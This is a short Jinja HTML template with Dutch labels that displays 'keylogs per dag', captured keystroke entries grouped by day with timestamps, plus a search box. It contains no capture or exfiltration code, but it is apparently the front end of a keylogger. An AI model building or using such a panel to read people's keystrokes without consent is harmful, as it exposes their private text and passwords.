{% extends "base.html" %}
{% block title %}Logs bekijken{% endblock %}

{% block content %}
    <h1>📑 Keylogs per dag</h1>
    <form action="/search" method="get" style="margin-bottom: 1.5rem;">
        <input type="text" name="q" placeholder="Zoekterm..." required>
        <button type="submit">Zoeken</button>
    </form>

    {% for day, entries in logs_by_day.items()|sort(reverse=True) %}
        <h2>📆 {{ day }}</h2>
        <ul>
            {% for ts, log in entries %}
                <li><b>{{ ts.split("T")[1].split(".")[0] }}</b> → <span style="color:#0ff;">{{ log }}</span></li>
            {% endfor %}
        </ul>
    {% endfor %}
{% endblock %}

